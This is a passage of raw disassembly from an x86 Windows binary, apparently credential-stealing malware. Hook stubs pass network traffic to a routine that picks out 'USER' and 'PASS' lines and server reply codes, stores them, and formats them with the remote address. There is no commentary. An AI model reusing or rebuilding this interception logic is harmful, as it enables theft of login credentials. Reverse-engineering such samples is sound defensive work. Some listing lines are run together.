jb short loc_40E668
jmp short loc_40E67E
; ---------------------------------------------------------------------------
loc_40E677: ; CODE XREF: sub_40E653+18�j
imul eax, 0Ch
add eax, edx
jnz short loc_40E6A9
loc_40E67E: ; CODE XREF: sub_40E653+11�j
; sub_40E653+22�j
inc ecx
imul ecx, 0Ch
push ecx
push edx
call sub_40A91F
pop ecx
pop ecx
mov ecx, eax
test ecx, ecx
jnz short loc_40E693
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E693: ; CODE XREF: sub_40E653+3C�j
mov eax, dword_410328
imul eax, 0Ch
add eax, ecx
inc dword_410328
mov dword_41032C, ecx
loc_40E6A9: ; CODE XREF: sub_40E653+29�j
mov ecx, [esp+4+arg_0]
mov [eax], ecx
pop esi
retn
sub_40E653 endp
; =============== S U B R O U T I N E =======================================
sub_40E6B1 proc near ; CODE XREF: sub_40E758+F6�p
; sub_40E758+144�p ...
arg_0 = byte ptr 4
push ebx
push dword ptr [esi+4]
xor ebx, ebx
mov [esi], ebx
call sub_409317
push dword ptr [esi+8]
mov [esi+4], ebx
call sub_409317
cmp [esp+0Ch+arg_0], bl
pop ecx
pop ecx
mov [esi+8], ebx
jnz short loc_40E726
mov eax, dword_410328
cmp eax, ebx
jbe short loc_40E726
mov ecx, dword_41032C
mov edx, eax
imul edx, 0Ch
lea edx, [edx+ecx-0Ch]
cmp esi, edx
jnz short loc_40E726
cmp eax, 1
jnz short loc_40E70A
push ecx
call sub_409317
pop ecx
mov dword_41032C, ebx
mov dword_410328, ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40E70A: ; CODE XREF: sub_40E6B1+42�j
dec eax
imul eax, 0Ch
push eax
push ecx
call sub_40A91F
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40E726
dec dword_410328
mov dword_41032C, eax
loc_40E726: ; CODE XREF: sub_40E6B1+21�j
; sub_40E6B1+2A�j ...
pop ebx
retn
sub_40E6B1 endp
; ---------------------------------------------------------------------------
db 57h, 0BFh
dd offset dword_410310
dw 0FF57h
db 15h
dd offset dword_40FE84
db 0FFh, 74h, 24h
dd 0FEDFE808h, 0C085FFFFh, 560C7459h, 0F08B006Ah, 0FFFF64E8h
dd 575E59FFh
db 0FFh, 15h
dd offset dword_40FE88
dw 0C35Fh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E758 proc near ; CODE XREF: .data:0040EADD�p
; .data:0040EAF8�p ...
var_18 = byte ptr -18h
var_16 = word ptr -16h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
mov ebx, [ebp+arg_8]
cmp ebx, 3
jb loc_40EAAE
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
cmp edi, esi
jz loc_40EAAC
cmp [ebp+arg_0], esi
jz loc_40EAAC
mov al, [edi]
cmp al, 55h
mov [ebp+var_4], esi
jnz short loc_40E7A9
cmp byte ptr [edi+1], 53h
jnz short loc_40E7A9
cmp byte ptr [edi+2], 45h
jnz short loc_40E7A9
cmp byte ptr [edi+3], 52h
jnz short loc_40E7A9
cmp byte ptr [edi+4], 20h
jnz short loc_40E7A9
push 5
pop esi
jmp short loc_40E7E0
; ---------------------------------------------------------------------------
loc_40E7A9: ; CODE XREF: sub_40E758+32�j
; sub_40E758+38�j ...
cmp al, 50h
jnz loc_40E8C7
cmp byte ptr [edi+1], 41h
jnz loc_40E8C7
cmp byte ptr [edi+2], 53h
jnz loc_40E8C7
cmp byte ptr [edi+3], 53h
jnz loc_40E8C7
cmp byte ptr [edi+4], 20h
jnz loc_40E8C7
mov [ebp+var_4], 5
loc_40E7E0: ; CODE XREF: sub_40E758+4F�j
mov eax, ebx
sub eax, esi
mov [ebp+var_8], eax
inc eax
push eax
call sub_4092F9
mov edx, eax
test edx, edx
pop ecx
mov [ebp+arg_8], edx
jz loc_40EAAC
test esi, esi
mov ecx, esi
jnz short loc_40E81A
mov ecx, [ebp+var_4]
jmp short loc_40E81A
; ---------------------------------------------------------------------------
loc_40E807: ; CODE XREF: sub_40E758+C4�j
mov al, [ecx+edi]
cmp al, 0Ah
jz short loc_40E818
cmp al, 0Dh
jz short loc_40E818
test al, al
jz short loc_40E818
mov [edx], al
loc_40E818: ; CODE XREF: sub_40E758+B4�j
; sub_40E758+B8�j ...
inc ecx
inc edx
loc_40E81A: ; CODE XREF: sub_40E758+A8�j
; sub_40E758+AD�j
cmp ecx, ebx
jb short loc_40E807
mov edi, offset dword_410310
push edi
call dword_40FE84 ; RtlEnterCriticalSection
test esi, esi
jz short loc_40E868
push [ebp+arg_0]
call sub_40E61D
mov esi, eax
test esi, esi
pop ecx
jnz short loc_40E84C
push [ebp+arg_0]
call sub_40E653
mov esi, eax
test esi, esi
pop ecx
jz short loc_40E8A2
loc_40E84C: ; CODE XREF: sub_40E758+E3�j
push 1
call sub_40E6B1
push [ebp+var_8]
mov eax, [ebp+arg_0]
push [ebp+arg_8]
mov [esi], eax
call sub_40A747
mov [esi+4], eax
jmp short loc_40E894
; ---------------------------------------------------------------------------
loc_40E868: ; CODE XREF: sub_40E758+D4�j
cmp [ebp+var_4], 0
jz short loc_40E8A2
push [ebp+arg_0]
call sub_40E61D
mov esi, eax
test esi, esi
pop ecx
jz short loc_40E8A2
push dword ptr [esi+8]
call sub_409317
sub ebx, [ebp+var_4]
push ebx
push [ebp+arg_8]
call sub_40A747
mov [esi+8], eax
loc_40E894: ; CODE XREF: sub_40E758+10E�j
add esp, 0Ch
test eax, eax
jnz short loc_40E8A2
push eax
call sub_40E6B1
pop ecx
loc_40E8A2: ; CODE XREF: sub_40E758+F2�j
; sub_40E758+114�j ...
push edi
call dword_40FE88 ; RtlLeaveCriticalSection
push [ebp+arg_8]
call sub_409317
pop ecx
jmp loc_40EAAC
; ---------------------------------------------------------------------------
loc_40E8B7: ; CODE XREF: sub_40E758+172�j
mov al, [edi+ebx-1]
cmp al, 0Dh
jz short loc_40E8C3
cmp al, 0Ah
jnz short loc_40E8CC
loc_40E8C3: ; CODE XREF: sub_40E758+165�j
dec ebx
mov [ebp+arg_8], ebx
loc_40E8C7: ; CODE XREF: sub_40E758+53�j
; sub_40E758+5D�j ...
cmp ebx, 1
ja short loc_40E8B7
loc_40E8CC: ; CODE XREF: sub_40E758+169�j
lea eax, [ebx-3]
cmp eax, 1
ja loc_40EAAC
push offset dword_410310
call dword_40FE84 ; RtlEnterCriticalSection
push [ebp+arg_0]
call sub_40E61D
mov esi, eax
xor eax, eax
cmp esi, eax
pop ecx
jz loc_40EAA1
cmp [esi+4], eax
jz loc_40EA9A
cmp [esi+8], eax
jz loc_40EA9A
cmp ebx, 3
jnz short loc_40E938
mov al, [edi]
cmp al, 43h
jz short loc_40E91D
cmp al, 50h
jnz loc_40EAA1
loc_40E91D: ; CODE XREF: sub_40E758+1BB�j
cmp byte ptr [edi+1], 57h
jnz loc_40EAA1
cmp byte ptr [edi+2], 44h
jnz loc_40EAA1
loc_40E931: ; CODE XREF: sub_40E758+204�j
; sub_40E758+21E�j ...
mov bl, 1
jmp loc_40E9CC
; ---------------------------------------------------------------------------
loc_40E938: ; CODE XREF: sub_40E758+1B5�j
push 4
pop ebx
cmp [ebp+arg_8], ebx
jnz loc_40EAA1
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+14Ch]
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_40E931
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+150h]
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_40E931
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+154h]
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_40E931
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+158h]
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_40E9CA
mov eax, dword_40FB34
push ebx
push ebx
push edi
push dword ptr [eax+15Ch]
call sub_408F6D
add esp, 10h
test eax, eax
jnz loc_40EAA1
loc_40E9CA: ; CODE XREF: sub_40E758+252�j
mov bl, 2
loc_40E9CC: ; CODE XREF: sub_40E758+1DB�j
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
mov [ebp+arg_8], 10h
call dword_40FCD0
test eax, eax
jnz short loc_40EA19
lea eax, [ebp+var_18]
push eax
call sub_405DFE
test al, al
pop ecx
jnz short loc_40EA19
cmp bl, 1
jnz short loc_40EA19
mov eax, dword_40FB34
push 0FFFFFFFFh
push 0FFFFFFFFh
push dword ptr [eax+160h]
push dword ptr [esi+4]
call sub_408F6D
add esp, 10h
test eax, eax
jnz short loc_40EA8D
loc_40EA19: ; CODE XREF: sub_40E758+28E�j
; sub_40E758+29C�j ...
cmp bl, 2
jnz short loc_40EA89
mov eax, dword_40FB34
mov edi, [eax+16Ch]
loc_40EA29: ; CODE XREF: sub_40E758+340�j
movzx eax, [ebp+var_16]
mov ecx, [esi+8]
xor edx, edx
mov dh, al
shr eax, 8
or edx, eax
movzx eax, [ebp+var_11]
push edx
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push ecx
push dword ptr [esi+4]
push edi
push ecx
call dword_40FD94 ; lstrlenA
push dword ptr [esi+4]
mov edi, eax
call dword_40FD94 ; lstrlenA
lea eax, [edi+eax+32h]
push eax
mov eax, dword_40FB34
push dword ptr [eax+164h]
xor eax, eax
cmp bl, 1
setnz al
add eax, 3
push eax
call sub_40B583
add esp, 2Ch
loc_40EA89: ; CODE XREF: sub_40E758+2C4�j
push 0
jmp short loc_40EA9B
; ---------------------------------------------------------------------------
loc_40EA8D: ; CODE XREF: sub_40E758+2BF�j
mov eax, dword_40FB34
mov edi, [eax+168h]
jmp short loc_40EA29
; ---------------------------------------------------------------------------
loc_40EA9A: ; CODE XREF: sub_40E758+1A3�j
; sub_40E758+1AC�j
push eax
loc_40EA9B: ; CODE XREF: sub_40E758+333�j
call sub_40E6B1
pop ecx
loc_40EAA1: ; CODE XREF: sub_40E758+19A�j
; sub_40E758+1BF�j ...
push offset dword_410310
call dword_40FE88 ; RtlLeaveCriticalSection
loc_40EAAC: ; CODE XREF: sub_40E758+1C�j
; sub_40E758+25�j ...
pop edi
pop esi
loc_40EAAE: ; CODE XREF: sub_40E758+D�j
pop ebx
leave
retn
sub_40E758 endp
; ---------------------------------------------------------------------------
byte_40EAB1 db 0FFh, 74h, 24h ; DATA XREF: .data:0040F188�o
dd 0FC6EE804h, 0FF59FFFFh
db 25h
dd offset dword_40FBBC
byte_40EAC1 db 0FFh, 74h, 24h ; DATA XREF: .data:0040F200�o
dd 0FC5EE804h, 0FF59FFFFh
db 25h
dd offset dword_40FCC0
; ---------------------------------------------------------------------------
loc_40EAD1: ; DATA XREF: .data:0040F1EC�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40E758
add esp, 0Ch
pop ebp
jmp dword_40FCC8
; ---------------------------------------------------------------------------
loc_40EAEC: ; DATA XREF: .data:0040F1D8�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40E758
add esp, 0Ch
pop ebp
jmp dword_40FCC4
; ---------------------------------------------------------------------------
loc_40EB07: ; DATA XREF: .data:0040F174�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40E758
add esp, 0Ch
pop ebp
jmp dword_40FBB8
; ---------------------------------------------------------------------------
loc_40EB22: ; DATA XREF: .data:0040F1C4�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40E758
add esp, 0Ch
pop ebp
jmp dword_40FCCC
; ---------------------------------------------------------------------------
loc_40EB3D: ; DATA XREF: .data:0040F160�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40E758
add esp, 0Ch
pop ebp
jmp dword_40FBB4
; ---------------------------------------------------------------------------
loc_40EB58: ; DATA XREF: .data:0040F1B0�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40E758
add esp, 0Ch
pop ebp
jmp dword_40FCBC
; ---------------------------------------------------------------------------
align 4
dword_40EB74 dd 124h dup(0)
dd offset dword_4011B8+0A0h
dd offset sub_404337
dd offset dword_40FC2C
dd 2 dup(0)
dd offset dword_4011B8+94h
dd offset sub_4043A8
dd offset dword_40FC38
dd 2 dup(0)
dd offset dword_4011B8+7Ch
dd offset sub_40436A
dd offset dword_40FC40
align 10h
dd offset dword_4011B8+64h
dd offset sub_404416
dd offset dword_40FC34
dd 6 dup(0)
byte_40F064 db 0 ; DATA XREF: sub_4043CD+1B�r
; sub_4158F3+1B�r
byte_40F065 db 0 ; DATA XREF: sub_4043CD+A�r
; sub_404416+C2�o ...
dw 3
dword_40F068 dd 0 dd offset dword_4011B8+50h
dd offset loc_40E4E1
dd offset dword_40FB68
align 10h
dd offset dword_4011B8+3Ch
dd offset loc_40E501
dd offset dword_40FB50
dd 2 dup(0)
dd offset dword_4011B8+28h
dd offset loc_40E5C9
dd offset dword_40FB6C
dd 2 dup(0)
dd offset dword_4011B8+14h
dd offset loc_40E5E6
dd offset dword_40FB70
dd 2 dup(0)
dd offset dword_4011B8
dd 40DF0Dh
dd offset dword_40FB54
align 10h
dd offset dword_4011A0
dd 40DF2Dh
dd offset dword_40FB80
dd 2 dup(0)
dd offset dword_40116C+1Ch
dd 40DF4Eh
dd offset dword_40FB84
dd 2 dup(0)
dd offset dword_40116C
dd 40DF6Fh
dd offset dword_40FB7C
dd 2 dup(0)
dd offset dword_40112C+28h
dd 40DDBFh
dd offset dword_40FB40
align 10h
dd offset dword_40112C+18h
dd 40D94Ah
dd offset dword_40FB60
dd 2 dup(0)
dd offset dword_40112C+8
dd 40D99Bh
dd offset dword_40FB90
dd 6 dup(0)
dword_40F158 dd 13h dd offset dword_40112C
dd offset loc_40EB3D
dd offset dword_40FBB4
dd 0
dd 14h
dd offset dword_401124
dd offset loc_40EB07
dd offset dword_40FBB8
align 10h
dd 3
dd offset dword_401114
dd offset byte_40EAB1
dd offset dword_40FBBC
dd 6 dup(0)
dword_40F1A8 dd 13h dd offset dword_40112C
dd offset loc_40EB58
dd offset dword_40FCBC
dd 0
dd 14h
dd offset dword_401124
dd offset loc_40EB22
dd offset dword_40FCCC
align 10h
dd 4Ch
dd offset dword_4010FC+0Ch
dd offset loc_40EAEC
dd offset dword_40FCC4
dd 0
dd 4Eh
dd offset dword_4010FC
dd offset loc_40EAD1
dd offset dword_40FCC8
align 8
dd 3
dd offset dword_401114
dd offset byte_40EAC1
dd offset dword_40FCC0
dword_40F208 dd 7 dup(0)
dd offset dword_4010EC
dd offset sub_404A23
dd offset dword_40FADC
dd 2 dup(0)
dd offset dword_401088+54h
dd offset sub_4049F7
dd offset dword_40FAD8
dd 2 dup(0)
dd offset dword_401088+44h
dd offset sub_404A4F
dd offset dword_40FAE0
align 10h
dd offset dword_401088+34h
dd offset sub_404A7E
dd offset dword_40FAD4
dd 2 dup(0)
dd offset dword_401088+20h
dd offset sub_40471E
dd offset dword_40FAE8
dword_40F280 dd 7 dup(0)
dd offset dword_401088+0Ch
dd offset sub_4033DA
dd offset dword_40FC60
dd 6 dup(0)
off_40F2C0 dd offset dword_401088 ; DATA XREF: sub_404222+C6�o
; sub_40436A+2D�o ...
dd offset dword_40FC24
dd offset dword_40EB74+48Ch
align 10h
dd offset dword_401078
dd offset dword_40FBB0
dd offset dword_40F158
align 10h
dd offset dword_40106C
dd offset dword_40FCB8
dd offset dword_40F1A8
align 10h
dd offset dword_40105C
dd offset dword_40FB38
dd offset dword_40F068
align 10h
dd offset dword_401050
dd offset dword_40FAC8
dd offset dword_40F208+18h
align 10h
dd offset dword_401040
dd offset dword_40FC44
dd offset dword_40F280+18h
dd 5 dup(0)
word_40F330 dw 42h ; DATA XREF: sub_407335+AC�r
; sub_407335+E4�r ...
byte_40F332 db 1 ; DATA XREF: sub_407335:loc_407485�r
; .data:loc_4189AB�r
byte_40F333 db 1 ; DATA XREF: sub_407335:loc_407456�r
; .data:loc_41897C�r
off_40F334 dd offset sub_406F8C ; DATA XREF: sub_407335+176�r
; .data:004189D1�r
dd 1010043h
dd offset sub_406FA6
dd 1010040h
dd offset sub_406FC4
dd 1010041h
dd offset sub_406FDE
dd 66h
dd offset sub_406FFC
dd 67h
dd offset sub_406FFC
dd 1010065h
dd offset sub_407028
dd 3Ch
dd offset sub_4070E1
dd 100003Dh
dd offset sub_407115
dd 3Eh, 0
dd 101003Fh
dd offset sub_40712D
dd 44h, 0
dd 3Ah, 0
dd 3Bh, 0
dd 1010045h
dd offset sub_407164
dd 1010046h
dd offset sub_407164
dd 1010047h
dd offset sub_407164
dd 1010048h
dd offset sub_407164
dword_40F3C0 dd 0 dd offset dword_4011B8+0A0h
dd offset sub_404337
dd offset dword_40FC2C
dd 6 dup(0)
off_40F3E8 dd offset dword_401088 ; DATA XREF: sub_4087B5+77�o
; .data:00419D52�o
dd offset dword_40FC24
dd offset dword_40F3C0
dd 5 dup(0)
off_40F408 dd offset dword_402A58 ; DATA XREF: sub_40AAD4+3C�r
; sub_40AAD4+54�r ...
dd offset dword_4029FC+50h
dd offset dword_4029FC+44h
dd offset dword_4029FC+38h
dd offset dword_4029FC+28h
dd offset dword_4029FC+18h
dd offset dword_4029FC+8
dd offset dword_4029FC
dd offset dword_402978+78h
dd offset dword_402978+60h
dd offset dword_402978+48h
dd offset dword_402978+30h
dd offset dword_402978+18h
dd offset dword_402978
dd offset dword_402940
dd offset dword_402848+0C0h
dd offset dword_402848+88h
dd offset dword_402848+80h
dd offset dword_402848+48h
dd offset dword_402848+18h
dd offset dword_402848+0Ch
dd offset dword_402848
dd offset dword_402830+0Ch
dd offset dword_402830
dd offset dword_402790+8Ch
dd offset dword_402790+80h
dd offset dword_402790+78h
dd offset dword_402790+6Ch
dd offset dword_402790+5Ch
dd offset dword_402790+4Ch
dd offset dword_402790+3Ch
dd offset dword_402790+28h
dd offset dword_402790+10h
dd offset dword_402790
dd offset dword_402718+68h
dd offset dword_402718+4Ch
dd offset dword_402718+40h
dd offset dword_402718+34h
dd offset dword_402718+24h
dd offset dword_402718+18h
dd offset dword_402718+0Ch
dd offset dword_402718
dd offset dword_40264C+0B8h
dd offset dword_40264C+0A4h
dd offset dword_40264C+84h
dd offset dword_40264C+70h
dd offset dword_40264C+54h
dd offset dword_40264C+3Ch
dd offset dword_40264C+24h
dd offset dword_40264C+0Ch
dd offset dword_40264C
dd offset dword_402624+10h
dd offset dword_402624
dd offset dword_4025F8+10h
dd offset dword_4025F8
dd offset dword_4025D0+1Ch
dd offset dword_4025D0+0Ch
dd offset dword_4025D0
dd offset dword_40259C+28h
dd offset dword_40259C+1Ch
dd offset dword_40259C+10h
dd offset dword_40259C+8
dd offset dword_40259C
dd offset dword_402570+1Ch
dd offset dword_402570+10h
dd offset dword_402570
dd offset dword_402548+18h
dd offset dword_402548+8
dd offset dword_402548
dd offset dword_402534+8
dd offset dword_402534
dd offset dword_4024C4+64h
dd offset dword_4024C4+5Ch
dd offset dword_4024C4+50h
dd offset dword_4024C4+40h
dd offset dword_4024C4+30h
dd offset dword_4024C4+20h
dd offset dword_4024C4+18h
dd offset dword_4024C4
dd offset aZeKeaskabuDwqa ; "\"‡¥²°ª¥™ª¡ž]¤WŸ›O†Ž‡E‹†~u|oylkh"
dd offset dword_402464+1Ch
dd offset dword_402464
dd offset dword_402424+34h
dd offset dword_402424+2Ch
dd offset dword_402424+24h
dd offset dword_402424+1Ch
dd offset dword_402424+14h
dd offset dword_402424+0Ch
dd offset dword_402424
dd offset dword_4022A4+160h
dd offset dword_4022A4+158h
dd offset dword_4022A4+150h
dd offset dword_4022A4+10Ch
dd offset dword_4022A4+0DCh
dd offset dword_4022A4+0C8h
dd offset dword_4022A4+0B4h
dd offset dword_4022A4+0A0h
dd offset dword_4022A4+8Ch
dd offset dword_4022A4+70h
dd offset dword_4022A4+64h
dd offset dword_4022A4+5Ch
dd offset dword_4022A4+50h
dd offset dword_4022A4+48h
dd offset dword_4022A4+40h
dd offset dword_4022A4
dd offset dword_402284+8
dd offset dword_402284
dd offset dword_40223C+40h
dd offset dword_40223C+20h
dd offset dword_40223C+10h
dd offset dword_40223C
dd 9876h
dword_40F5C8 dd 0 ; sub_403956+91�r ...
dword_40F5CC dd 0 ; sub_4034E8+57�w ...
dword_40F5D0 dd 82h dup(0) ; sub_4034E8+3D�o ...
dword_40F7D8 dd 6 dup(0) ; sub_403956:loc_403AD3�o ...
dword_40F7F0 dd 0 ; sub_4035AD+34�r ...
dword_40F7F4 dd 0 ; sub_4035AD+26�r ...
dword_40F7F8 dd 6 dup(0) ; sub_403C06:loc_403CA1�o ...
dword_40F810 dd 0 ; sub_403C06+8E�r ...
dword_40F814 dd 0 ; sub_403CC8:loc_403DAA�r ...
dword_40F818 dd 0 ; sub_404416+88�r ...
dword_40F81C dd 6 dup(0) ; sub_4043A8+15�o ...
byte_40F834 db 0 ; DATA XREF: sub_4045F1+1C�w
; sub_404624:loc_404672�r ...
align 4
dword_40F838 dd 6 dup(0) ; sub_404624:loc_404643�o ...
dword_40F850 dd 0 ; sub_404624+33�r ...
dword_40F854 dd 0 ; .text:004045E3�w ...
dword_40F858 dd 0 ; sub_4045F1+26�w ...
word_40F85C dw 0 ; DATA XREF: .text:004045C3�w
; sub_404888+17�w ...
align 10h
dword_40F860 dd 0 ; sub_4056AC+E4�r ...
dword_40F864 dd 0 ; sub_4056AC+F1�r ...
dword_40F868 dd 0 ; sub_4057EE+20�w ...
dword_40F86C dd 0 ; sub_4056AC+78�o ...
dword_40F870 dd 82h dup(0) ; sub_4056AC+D8�o ...
dword_40FA78 dd 0 ; sub_4056AC+BE�o ...
dword_40FA7C dd 0 ; sub_4056AC+96�o ...
dd 0Dh dup(0)
dword_40FAB4 dd 0 ; sub_403B25+15�w ...
dword_40FAB8 dd 0 ; sub_403723+186�r ...
dword_40FABC dd 0 ; sub_403956+79�r ...
word_40FAC0 dw 0 ; DATA XREF: sub_40826C+13�o
; sub_4089D8+12D�r ...
word_40FAC2 dw 0 ; DATA XREF: sub_40826C+24�o
; sub_4089D8+1A5�r ...
word_40FAC4 dw 0 ; DATA XREF: sub_40826C+35�o
; sub_4089D8+166�r ...
align 4
dword_40FAC8 dd 0 ; .data:0040F304�o ...
dword_40FACC dd 0 ; sub_40A377+66�r ...
dword_40FAD0 dd 0 ; sub_40AC72+1A4�r ...
dword_40FAD4 dd 0 ; sub_404A7E+13�r ...
dword_40FAD8 dd 0 ; sub_4049F7+10�r ...
dword_40FADC dd 0 ; sub_404A23+10�r ...
dword_40FAE0 dd 0 ; sub_404A4F+13�r ...
dword_40FAE4 dd 0 ; sub_4048AF+C3�r ...
dword_40FAE8 dd 0 ; sub_40471E+7�r ...
dword_40FAEC dd 0 ; sub_4048AF+10D�r ...
dword_40FAF0 dd 0 ; sub_4048AF+EF�r ...
dword_40FAF4 dd 0 ; .text:0040D31D�r ...
dword_40FAF8 dd 0 ; .text:0040D2F5�r ...
dword_40FAFC dd 0 ; sub_40B046+4B�r ...
dword_40FB00 dd 0 ; sub_40B046+44�r ...
dword_40FB04 dd 0 ; sub_40A062+15�r ...
dword_40FB08 dd 0 ; sub_40A062+2D�r ...
dword_40FB0C dd 0 ; sub_40A062+22�r ...
dword_40FB10 dd 0 ; sub_40A062+43�r ...
dword_40FB14 dd 0 ; sub_40A062+5B�r ...
dword_40FB18 dd 0 ; sub_40A062+50�r ...
dword_40FB1C dd 0 ; sub_407570+2A2�r ...
dword_40FB20 dd 0 ; sub_407570+2BA�r ...
dword_40FB24 dd 0 ; sub_407570+349�r ...
dword_40FB28 dd 0 ; sub_407570+2B0�r ...
dword_40FB2C dd 0 ; sub_4072A7+4C�r ...
dword_40FB30 dd 0 ; .text:004051FC�r ...
dword_40FB34 dd 0 ; sub_4033BC+4�r ...
dword_40FB38 dd 0 ; .data:0040F2F4�o ...
dword_40FB3C dd 0 ; sub_4087B5+4E�r ...
dword_40FB40 dd 0 ; sub_403723+29�r ...
dword_40FB44 dd 0 ; sub_403956+7F�r ...
dword_40FB48 dd 0 ; sub_4063D8+BB�r ...
dword_40FB4C dd 0 ; sub_4063D8+180�r ...
dword_40FB50 dd 0 ; sub_4063D8+195�r ...
dword_40FB54 dd 0 ; sub_405C0B+34�r ...
dword_40FB58 dd 0 ; sub_4063D8+81�r ...
dword_40FB5C dd 0 dword_40FB60 dd 0 ; sub_405CCB+28�r ...
dword_40FB64 dd 0 ; sub_40CDBD+1E�r ...
dword_40FB68 dd 0 ; .data:0040F074�o
dword_40FB6C dd 0 ; sub_40E521+88�r ...
dword_40FB70 dd 0 ; sub_40E521+8F�r ...
dword_40FB74 dd 0 ; sub_40E45F+1A�r ...
dword_40FB78 dd 0 ; sub_40D058+16B�r ...
dword_40FB7C dd 0 ; .data:0040F100�o ...
dword_40FB80 dd 0 ; .data:0040F0D8�o ...
dword_40FB84 dd 0 ; .text:0040D2C4�r ...
dword_40FB88 dd 0 ; .text:0040D258�r ...
dword_40FB8C dd 0 ; sub_4087B5+69�r ...
dword_40FB90 dd 0 ; .data:0040F13C�o ...
dword_40FB94 dd 0 ; sub_404C11+49�r ...
dword_40FB98 dd 0 ; sub_404C11+D9�r ...
dword_40FB9C dd 0 ; sub_404C11+104�r ...
dword_40FBA0 dd 0 ; sub_404C11+B9�r ...
dword_40FBA4 dd 0 ; sub_41BA7B+36�w
dword_40FBA8 dd 0 ; sub_404C11+127�r ...
word_40FBAC dw 0 ; DATA XREF: sub_4086F4+39�r
; sub_40AAD4+191�w ...
align 10h
dword_40FBB0 dd 0 ; sub_40A555+132�w ...
dword_40FBB4 dd 0 ; .data:0040EB52�r ...
dword_40FBB8 dd 0 ; .data:0040EB1C�r ...
dword_40FBBC dd 0 ; .data:0040EABD�o ...
dword_40FBC0 dd 0 ; sub_41BA7B+E6�w
dword_40FBC4 dd 0 ; sub_40AE6F+3F�r ...
dword_40FBC8 dd 0 ; sub_40A377+2F�r ...
dword_40FBCC dd 0 ; sub_40A377+52�r ...
dword_40FBD0 dd 0 ; sub_40A137+15�r ...
dword_40FBD4 dd 0 ; sub_40A137+2E�r ...
dword_40FBD8 dd 0 ; sub_40A137+7A�r ...
dword_40FBDC dd 0 ; sub_403B4F+48�r ...
dword_40FBE0 dd 0 ; sub_403B4F+24�r ...
dword_40FBE4 dd 0 ; sub_403B4F+5F�r ...
dword_40FBE8 dd 0 ; sub_403BB9+3B�r ...
dword_40FBEC dd 0 ; sub_40857D+12F�r ...
dword_40FBF0 dd 0 dword_40FBF4 dd 0 ; sub_40AAD4+F4�r ...
dword_40FBF8 dd 0 ; sub_40AAD4+FE�r ...
dword_40FBFC dd 0 ; sub_40B046+BE�r ...
dword_40FC00 dd 0 ; sub_40B046+85�r ...
dword_40FC04 dd 0 ; sub_40A1D3+19�r ...
dword_40FC08 dd 0 ; sub_40A1D3+31�r ...
dword_40FC0C dd 0 ; sub_40A1D3+4C�r ...
dword_40FC10 dd 0 ; sub_40A1D3+63�r ...
dword_40FC14 dd 0 ; sub_40A1D3+7A�r ...
dword_40FC18 dd 0 ; sub_40A1D3+84�r ...
dword_40FC1C dd 0 ; sub_403956+2B�r ...
dword_40FC20 dd 0 ; sub_4057EE+118�r ...
dword_40FC24 dd 0 ; .data:0040F2C4�o ...
dword_40FC28 dd 0 ; sub_404416+7A�r ...
dword_40FC2C dd 0 ; sub_406C44+B5�r ...
dword_40FC30 dd 0 ; sub_406C44+18�r ...
dword_40FC34 dd 0 ; sub_404416+2E�r ...
dword_40FC38 dd 0 ; sub_406D52+25�r ...
dword_40FC3C dd 0 ; sub_406D52+13�r ...
dword_40FC40 dd 0 ; sub_406D03+46�r ...
dword_40FC44 dd 0 ; .data:0040F314�o ...
dword_40FC48 dd 0 ; sub_40325F+14�r ...
dword_40FC4C dd 0 ; sub_40325F+150�r ...
dword_40FC50 dd 0 ; sub_40325F+138�r ...
dword_40FC54 dd 0 ; sub_40325F+130�r ...
dword_40FC58 dd 0 ; sub_40325F+125�r ...
dword_40FC5C dd 0 ; sub_40325F+34�r ...
dword_40FC60 dd 0 ; sub_4033DA+19�r ...
dword_40FC64 dd 0 ; sub_41BA7B+171�w
dword_40FC68 dd 0 ; sub_406148+1A�r ...
dword_40FC6C dd 0 ; sub_41BA7B+7E�w
dword_40FC70 dd 0 ; sub_404D6D+100�r ...
dword_40FC74 dd 0 ; sub_409123+78�r ...
dword_40FC78 dd 0 ; sub_4043CD+2F�r ...
dword_40FC7C dd 0 dword_40FC80 dd 0 ; sub_40B583+70�r ...
dword_40FC84 dd 0 ; sub_40325F+F0�r ...
dword_40FC88 dd 0 ; sub_404AAD+C6�r ...
dword_40FC8C dd 0 ; sub_4034A0+27�r ...
dword_40FC90 dd 0 dword_40FC94 dd 0 ; sub_40B850+BC�r ...
dword_40FC98 dd 0 ; sub_407028+60�r ...
dword_40FC9C dd 0 ; sub_403CC8+FF�r ...
dword_40FCA0 dd 0 ; sub_40A0CC+1D�r ...
dword_40FCA4 dd 0 ; sub_4056AC+5A�r ...
dword_40FCA8 dd 0 ; sub_41BA7B+9F�w
